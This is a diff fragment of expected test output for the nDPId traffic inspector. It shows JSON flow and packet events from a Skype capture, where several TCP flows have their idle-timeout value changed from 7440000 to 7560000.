00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MmQAAEARtULAqAEinTg0EDLdnGAAINARezsCntsIeaNpS6NjCmJc+OoOrMkvCcDa"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -420,10 +420,10 @@ 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/Lr4AAEAR0DTAqAEib91KFDLdnGEAK3JGe0MC70klwlgauZl1jUNJ9T6muSj9wXln3SVqW5QyJa+s4xA="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659480,"flow_last_seen":1431970659480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431970659480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659480,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaDxAAEAGUyXAqAEib91Nr8gyAbuh2H3fAAAAALAC\/\/+ohwAAAgQFtAEDAwUBAQgKPjHnRwAAAAAEAgAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPbBAAEAG45PAqAEiQAQXpsgznF2bjnkgAAAAALAC\/\/99bQAAAgQFtAEDAwUBAQgKPjHoqQAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659480,"flow_last_seen":1431970659480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431970659480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659480,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaDxAAEAGUyXAqAEib91Nr8gyAbuh2H3fAAAAALAC\/\/+ohwAAAgQFtAEDAwUBAQgKPjHnRwAAAAAEAgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPbBAAEAG45PAqAEiQAQXpsgznF2bjnkgAAAAALAC\/\/99bQAAAgQFtAEDAwUBAQgKPjHoqQAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1elAAAEARHtbAqAEinTeCkDLdnFAAIfN1e0UCt0zo\/WrZ+Zw8Ki6+SR8vgG1TLjatCw=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -439,24 +439,24 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAAA71A4AAEARxQ\/AqAEinTeCkjLdnGEAJ5FDe00CRUi6WS8h8mPi8e9oMy1XIZqCitDbn3NkpyCi9w=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1431970659837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970659837,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIgG7yDJl2k5Wodh94KASOJCbeAAAAgQFrAQCCApNo+OiPjHnRwEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1431970659837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970659837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vZ1AAEAG\/c\/AqAEib91Nr8gyAbuh2H3gZdpOV4AQECzxPQAAAQEICj4x6KxNo+Oi"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431970660037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970660037,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxdyDOxwWA5m455IaASOJAGLQAAAgQFrAQCCApMQvFqPjHoqQEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431970660037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660037,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0G21AAEAGBePAqAEiQAQXpsgznF2bjnkhscFgOoAQECxcjQAAAQEICj4x6XNMQvFq"} -00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1431970660159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431970660159,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJkcJAADIG5BVsoKNswKgBIgG7yBaV3SxsiZUqrIAYACaXjgAAAQEICmGAz38+MVp4FwMBARB8Fy4qyreLjg5Q96tDDF\/tJNQpsIShBClYLxny\/F4IVS87inYaH8NMzidehO4QJLb0Gpm5qZy83nu17ekToUXtOsjvJgerL5AdcFL4wkOs5YWIZJQILj89EVd3kwm2gSreMO6fU0x3sDxMFrXZesIKTvERW3z9QiBmYf77CRAcaBKDIZ4h8M6jvsMWFjh8rbcU6C9Yz3364yiyHbQuoqtvQN4EQD7H\/ZMlnDFOtnG2H8aPUdqUMD5HAjMSCpEQqc4JKy0wVFFuLxpIEra0u2hVB7ftMdJLJ\/sq+RNwy1Sfuv0g7qCHweCB0CkHYTzB2\/cU6qQOlFTex1tRE+sh29iBulHeN2MmenT9xvrZggKZYQ=="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1431970660159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660159,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/qVAAEAGakfAqAEibKCjbMgWAbuJlSqsld0tgYAQD\/f6XgAAAQEICj4x6exhgM9\/"} -01771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1431970660162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431970660162,"pkt":"0NQSxnP1PBXCt3IOCABFAAPuXRVAAEAGCB7AqAEibKCjbMgWAbuJlSqsld0tgYAYEABN6wAAAQEICj4x6e5hgM9\/FwMBACBZ+Bs2C0RS\/3DQyGZlP7ulpgg75GP5qHQjRGtchozZwxcDAQOQsZo+mdYHDHNhryD2tBwTy4NvJ6ZcB90CLvDuO3oQpA0NMcbrVNY5NoFZnnz0+pHYPlsxDiwS7sQ7DD24qzDLtHgUUDp9pF8b6+msIHWzLPEMF8+q7Hjw2nVwpow1oTrrramWFNK3HRWRwVplTmpzcS1pGJ+gQZaUVDp8kdn+ynK0M3\/CdKLtFbx\/CK0N6q8IWYmbmyMU5F09Bl18WwyIuujJA\/tFE5EWnSsW2X+zhBTRq9ZI\/U83NB7qUlABm1QnhF8bT1juNjzO0mWZlZFkQTsnKvttlKSdtcMJ5dRpAqaA7SHB9Yz5a49nYhRO+wwnisVOiZGDLnrE+5oMmTb9C9ZKB5wr20bAzzEkorS06bd9G1Av+Y\/0Lf00cKMeFW4\/NlQQW2HF8cVYvIZB6\/NQlnUH0R\/vBxkZqKxj1qnAgjVDBnssNNPdbIKrHQdoBZOJ1oafA1nh+V4oZbi2LQd\/E9fD9yqlUtsVwzp7nZEacc3p6m0hUW7kAV1Xt3xzsImKJZZ7j62VNDmcm6WWPL29PEP1oF9dSb1pTuKLUUHMDB7w2YxBjm\/ZP6TnMxz3NjZHO6QfscWBsVMMmj8RnOruQ3QLIGDLGpDyMgBlDBTqoOiUC8PgBmSlGAPlhRVT95WOL1mqA6t0DBes+DH8fSZeIVvA3K7YCF4kypftCQiLFXrErN2XOvSvejhBSuUJcdOOdCNOjGoPoLOWoqVEN7LXgsXaWfdoBTx79TQIPG1as39Z7fRVj+fkKyD61xYiyqgtf1\/WpWVrCyTwKovWQ0C6GFD907jbLAxlD1UmA3abuFNLCt\/acdLUjndrKvuooQD6IYCIwrJi8YL7kKb0+32ovATeOhPAdbLgWa9wSUgKddlog7emY+Y\/Esr+n4M8E4bdevnoTb75M4ozaSVREGSwce5U3XhhEIMmQQkznZpj46Kf9jFwDbzxK7wZgQZ21paket5\/tiCE9zIgnjVS0wcx5TiuHX4egIJeH+3peLDINK2jmmDw6Tm7kJ69c9scP9Gd7zhw6XHG1S0IW6aTMTHKdqb5u2V1sEk8osIRYPNxQKLPY35nEHSqNlCZVyRPLhgWH+JjqVOEwNbhNBOOCigDYop+TfjfQDQrLH+IrQWISQBJnU69BfsNuFeEx3PLuH6o+oBZH+QNZRQR6lheial\/vXPOSCwP4oQlK11s+sl5+hhICPKCRXfAUncH7wDdsLSe"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1431970659837,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970659837,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIgG7yDJl2k5Wodh94KASOJCbeAAAAgQFrAQCCApNo+OiPjHnRwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1431970659837,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970659837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vZ1AAEAG\/c\/AqAEib91Nr8gyAbuh2H3gZdpOV4AQECzxPQAAAQEICj4x6KxNo+Oi"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431970660037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970660037,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxdyDOxwWA5m455IaASOJAGLQAAAgQFrAQCCApMQvFqPjHoqQEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431970660037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660037,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0G21AAEAGBePAqAEiQAQXpsgznF2bjnkhscFgOoAQECxcjQAAAQEICj4x6XNMQvFq"} +00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660159,"flow_last_seen":1431970660159,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431970660159,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1431970660159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431970660159,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJkcJAADIG5BVsoKNswKgBIgG7yBaV3SxsiZUqrIAYACaXjgAAAQEICmGAz38+MVp4FwMBARB8Fy4qyreLjg5Q96tDDF\/tJNQpsIShBClYLxny\/F4IVS87inYaH8NMzidehO4QJLb0Gpm5qZy83nu17ekToUXtOsjvJgerL5AdcFL4wkOs5YWIZJQILj89EVd3kwm2gSreMO6fU0x3sDxMFrXZesIKTvERW3z9QiBmYf77CRAcaBKDIZ4h8M6jvsMWFjh8rbcU6C9Yz3364yiyHbQuoqtvQN4EQD7H\/ZMlnDFOtnG2H8aPUdqUMD5HAjMSCpEQqc4JKy0wVFFuLxpIEra0u2hVB7ftMdJLJ\/sq+RNwy1Sfuv0g7qCHweCB0CkHYTzB2\/cU6qQOlFTex1tRE+sh29iBulHeN2MmenT9xvrZggKZYQ=="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1431970660159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970660159,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/qVAAEAGakfAqAEibKCjbMgWAbuJlSqsld0tgYAQD\/f6XgAAAQEICj4x6exhgM9\/"} +01771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1431970660162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431970660162,"pkt":"0NQSxnP1PBXCt3IOCABFAAPuXRVAAEAGCB7AqAEibKCjbMgWAbuJlSqsld0tgYAYEABN6wAAAQEICj4x6e5hgM9\/FwMBACBZ+Bs2C0RS\/3DQyGZlP7ulpgg75GP5qHQjRGtchozZwxcDAQOQsZo+mdYHDHNhryD2tBwTy4NvJ6ZcB90CLvDuO3oQpA0NMcbrVNY5NoFZnnz0+pHYPlsxDiwS7sQ7DD24qzDLtHgUUDp9pF8b6+msIHWzLPEMF8+q7Hjw2nVwpow1oTrrramWFNK3HRWRwVplTmpzcS1pGJ+gQZaUVDp8kdn+ynK0M3\/CdKLtFbx\/CK0N6q8IWYmbmyMU5F09Bl18WwyIuujJA\/tFE5EWnSsW2X+zhBTRq9ZI\/U83NB7qUlABm1QnhF8bT1juNjzO0mWZlZFkQTsnKvttlKSdtcMJ5dRpAqaA7SHB9Yz5a49nYhRO+wwnisVOiZGDLnrE+5oMmTb9C9ZKB5wr20bAzzEkorS06bd9G1Av+Y\/0Lf00cKMeFW4\/NlQQW2HF8cVYvIZB6\/NQlnUH0R\/vBxkZqKxj1qnAgjVDBnssNNPdbIKrHQdoBZOJ1oafA1nh+V4oZbi2LQd\/E9fD9yqlUtsVwzp7nZEacc3p6m0hUW7kAV1Xt3xzsImKJZZ7j62VNDmcm6WWPL29PEP1oF9dSb1pTuKLUUHMDB7w2YxBjm\/ZP6TnMxz3NjZHO6QfscWBsVMMmj8RnOruQ3QLIGDLGpDyMgBlDBTqoOiUC8PgBmSlGAPlhRVT95WOL1mqA6t0DBes+DH8fSZeIVvA3K7YCF4kypftCQiLFXrErN2XOvSvejhBSuUJcdOOdCNOjGoPoLOWoqVEN7LXgsXaWfdoBTx79TQIPG1as39Z7fRVj+fkKyD61xYiyqgtf1\/WpWVrCyTwKovWQ0C6GFD907jbLAxlD1UmA3abuFNLCt\/acdLUjndrKvuooQD6IYCIwrJi8YL7kKb0+32ovATeOhPAdbLgWa9wSUgKddlog7emY+Y\/Esr+n4M8E4bdevnoTb75M4ozaSVREGSwce5U3XhhEIMmQQkznZpj46Kf9jFwDbzxK7wZgQZ21paket5\/tiCE9zIgnjVS0wcx5TiuHX4egIJeH+3peLDINK2jmmDw6Tm7kJ69c9scP9Gd7zhw6XHG1S0IW6aTMTHKdqb5u2V1sEk8osIRYPNxQKLPY35nEHSqNlCZVyRPLhgWH+JjqVOEwNbhNBOOCigDYop+TfjfQDQrLH+IrQWISQBJnU69BfsNuFeEx3PLuH6o+oBZH+QNZRQR6lheial\/vXPOSCwP4oQlK11s+sl5+hhICPKCRXfAUncH7wDdsLSe"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6TMEAAEARsjLAqAEib91KGDLdnGAAJk69e08C7Jn\/msaru979SjBYNnh0LMk7Ko\/+l6KrptIV"} 